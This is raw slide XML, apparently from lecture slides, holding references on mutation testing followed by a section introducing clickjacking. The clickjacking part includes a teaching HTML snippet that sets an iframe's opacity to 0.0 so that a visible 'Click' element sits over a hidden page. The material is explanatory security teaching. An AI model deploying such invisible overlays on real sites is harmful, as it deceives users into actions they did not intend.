              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>R. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Lipton, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>F. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Sayward, “Hints </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>data selection: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Help </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the practicing  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>programmer”, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>IEEE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Computer </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Magazine</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Volume </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>11, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Issue </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>4, 1978, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>34‐41.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="286385" marR="120650" indent="-273685">
              <a:lnSpc>
                <a:spcPts val="1340"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="345"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="315595" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-65" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>W. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Howden, “Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mutation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and Completeness of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-35" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Test Sets”, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>IEEE </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Transaction </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software  Engineering</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Volume </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>8, Number 4, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>July </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>1982, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>371‐379.</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPts val="1340"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="340"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPlain" startAt="14"/>
              <a:tabLst>
                <a:tab pos="334010" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>M. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Woodward </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and K. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Halewood, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“From </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Weak </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Strong: Dead or </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Alive? </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of Some  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mutation </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Issues”, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proceedings </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Second </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Workshop </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Software </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Testing, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Verification </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" i="1" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and  Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>, Banff, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Alberta, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Canada, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>July </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>1988, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>152‐158.</a:t>
            </a:r>
            <a:endParaRPr sz="14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45461" y="1188212"/>
            <a:ext cx="320611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Part </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>III:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="25" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>Clickjacking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56</a:t>
            </a:fld>
            <a:endParaRPr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323335" y="616711"/>
            <a:ext cx="34143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What </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>clickjacking?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57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93902" y="1562353"/>
            <a:ext cx="7998459" cy="20008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5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Stealing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clickable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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actions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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-11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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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website</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-9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user</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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directing  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>towards </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>legitimate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>websites </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>without his/her</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-370" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>knowledge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3500">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="643890" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>If</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="3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multiple</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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websites</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-95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share</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13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common</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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graphical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display  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>medium, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>they</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-45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are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>subject </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:endParaRPr sz="24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03936" y="357632"/>
            <a:ext cx="9051925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057650" marR="5080" indent="-4045585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Background </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>on HTML: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>reducing opacity </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>level </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>50%  </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0"/>
              <a:t>0%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58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1222502" y="1563877"/>
            <a:ext cx="5429885" cy="4634230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530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800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="458470" indent="-445770">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434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457834" algn="l"/>
                <a:tab pos="458470" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="687070" indent="-674370">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430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686435" algn="l"/>
                <a:tab pos="687070" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;style&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" indent="-914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430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926465" algn="l"/>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5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{</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1035685" indent="-1022985">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434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1035685" algn="l"/>
                <a:tab pos="1036319" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>width:800px;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1041400" indent="-1028700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430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1040765" algn="l"/>
                <a:tab pos="1041400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>height:600px;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1096010" indent="-1083310">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434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1096010" algn="l"/>
                <a:tab pos="1096645" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>top:0;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left:0;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1041400" indent="-1028700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430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1040765" algn="l"/>
                <a:tab pos="1041400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>opacity:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" b="1" spc="-114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b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>0.0;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="927100" indent="-914400">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430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926465" algn="l"/>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="744220" indent="-731520">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="434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743585" algn="l"/>
                <a:tab pos="744220" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;/style&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="744220" indent="-731520">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430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743585" algn="l"/>
                <a:tab pos="744220" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&lt;div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Click</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-65" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
